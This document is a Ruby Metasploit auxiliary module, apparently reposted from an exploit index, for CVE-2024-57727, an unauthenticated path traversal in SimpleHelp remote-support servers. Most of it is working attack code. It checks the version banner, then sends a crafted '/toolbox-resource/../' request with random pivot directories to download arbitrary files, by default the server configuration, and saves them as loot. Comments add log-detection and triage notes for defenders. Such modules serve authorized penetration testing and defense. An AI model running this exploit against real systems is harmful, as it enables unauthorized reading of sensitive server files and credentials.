## https://sploitus.com/exploit?id=MSF:AUXILIARY-SCANNER-HTTP-SIMPLEHELP_TOOLBOX_PATH_TRAVERSAL-
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
# Auxiliary scanner for CVE-2024-57727, a path traversal in the SimpleHelp
# /toolbox-resource endpoint. The module has two parts:
#
# * #check reads the version banner the server publishes and compares it with
#   the affected release ranges (fixed releases: 5.5.8, 5.4.10, 5.3.9).
# * #run_host sends one traversal request and stores whatever comes back.
#
# Detection: every request made by #run_host is an unauthenticated GET whose
# path begins with /toolbox-resource/ and contains "../" segments. The module
# declares IOC_IN_LOGS, so the server's request logs are where to look for it.
class MetasploitModule < Msf::Auxiliary
  include Msf::Auxiliary::Report
  include Msf::Auxiliary::Scanner
  include Msf::Exploit::Remote::HttpClient
  prepend Msf::Exploit::Remote::AutoCheck

  # Declares the module metadata and its three datastore options.
  #
  # @param info [Hash] metadata handed in by the framework, merged via update_info
  def initialize(info = {})
    module_info = {
      'Name' => 'SimpleHelp Path Traversal Vulnerability CVE-2024-57727',
      # The text between the braces is the literal description string, so its
      # lines stay flush-left to keep the string unchanged.
      'Description' => %q{
There exists a path traversal vulnerability in the /toolbox-resource endpoint that enables unauthenticated
remote attackers to download arbitrary files from the SimpleHelp server via crafted HTTP requests
},
      'Author' => [
        'horizon3ai', # discovery
        'imjdl', # CVE-2024-57727 PoC
        'jheysel-r7' # module
      ],
      'References' => [
        ['URL', 'https://www.horizon3.ai/attack-research/disclosures/critical-vulnerabilities-in-simplehelp-remote-support-software/'], # Discovery
        ['URL', 'https://simple-help.com/kb---security-vulnerabilities-01-2025#security-vulnerabilities-in-simplehelp-5-5-7-and-earlier'], # Vendor advisory
        ['URL', 'https://rustlang.rs/posts/simple-help/'], # PoC write-up for CVE-2024-57727
        ['URL', 'https://attackerkb.com/topics/G4CTOrbDx0/cve-2024-57727'], # AttackerKB topic for CVE-2024-57727
        ['CVE', '2024-57727']
      ],
      'License' => MSF_LICENSE,
      'DisclosureDate' => '2025-01-12',
      'Notes' => {
        'Stability' => [CRASH_SAFE],
        # IOC_IN_LOGS: the requests are expected to be visible in server logs.
        'SideEffects' => [IOC_IN_LOGS],
        'Reliability' => []
      }
    }
    super(update_info(info, module_info))

    register_options(
      [
        OptString.new('TARGETURI', [true, 'The base path to SimpleHelp installation', '/']),
        OptString.new('FILEPATH', [true, 'The path to the file to read', 'configuration/serverconfig.xml']),
        OptInt.new('DEPTH', [true, 'Depth for Path Traversal', 2])
      ]
    )
  end

  # Version-based check: requests <TARGETURI>/allversions and parses the
  # "Visual Version:" banner. Nothing is read through the traversal here, so
  # the result is only as reliable as the banner the server reports.
  #
  # @return [Exploit::CheckCode] Unknown when no three-part version is found,
  #   Appears when the version lies in an affected range, Safe otherwise
  def check
    res = send_request_cgi(
      'method' => 'GET',
      'uri' => normalize_uri(target_uri.path, 'allversions')
    )

    # The pattern requires a three-part version (x.y.z); a missing response or
    # a banner in any other shape ends up as Unknown.
    banner = res&.body
    unless banner =~ /Visual Version:\s*(\d+\.\d+(?:\.\d+))/
      return Exploit::CheckCode::Unknown('Unable to retrieve SimpleHelp version.')
    end

    detected = Rex::Version.new(Regexp.last_match(1))

    # Affected ranges per release branch; the fixes are 5.5.8, 5.4.10 and 5.3.9.
    # NOTE(review): versions outside these three branches (for example anything
    # older than 5.3.0) fall through to Safe, while the vendor advisory linked
    # in References is titled "5.5.7 and earlier" - confirm before relying on a
    # Safe result for an older install.
    affected_ranges = [
      %w[5.5.0 5.5.7],
      %w[5.4.0 5.4.9],
      %w[5.3.0 5.3.8]
    ]
    affected = affected_ranges.any? do |lowest, highest|
      detected.between?(Rex::Version.new(lowest), Rex::Version.new(highest))
    end

    return Exploit::CheckCode::Appears("Version detected: #{detected}") if affected

    Exploit::CheckCode::Safe("Version detected: #{detected}")
  end

  # Sends one traversal request for FILEPATH and, on a non-empty HTTP 200
  # reply, records a vulnerability and saves the response body as loot.
  #
  # Triage notes for anyone reading the results:
  # * The finding is reported on status code and non-empty body alone; the
  #   body is never compared with the expected file, so a server that answers
  #   200 with an error page would show up as a false positive.
  # * The default FILEPATH is the server configuration file, so stored loot is
  #   presumably sensitive - handle and retain it accordingly.
  #
  # @param ip [String] address of the host being scanned, used to tag the loot
  # @return [void]
  def run_host(ip)
    # One directory name is picked at random per run, so the request path
    # differs between runs; log searches should not key on a single name.
    pivot_dir = %w[alertsdb invitations secmsg toolbox-resources backups sslconfig translations notifications techprefs history recordings templates html remotework toolbox].sample
    dot_segments = '../' * datastore['DEPTH']
    wanted_file = datastore['FILEPATH']
    request_path = "/toolbox-resource/../#{pivot_dir}/#{dot_segments}/#{wanted_file}"

    res = send_request_cgi(
      'method' => 'GET',
      'uri' => normalize_uri(target_uri.path, request_path)
    )

    # No response, a non-200 status, or an empty body all count as a miss.
    if res.nil? || res.code != 200 || !res.body.present?
      print_error('Nothing was downloaded')
      return
    end

    content = res.body
    vprint_line(content)
    print_good("Downloaded #{content.length} bytes")

    report_vuln(
      host: rhost,
      port: rport,
      proto: 'tcp',
      name: name,
      info: 'Module triggered a 200 reply',
      refs: references
    )

    # Stored as text/plain whatever the file actually contains.
    loot_path = store_loot(
      'simplehelp.traversal',
      'text/plain',
      ip,
      content,
      wanted_file
    )
    print_good("File saved in: #{loot_path}")
  end
end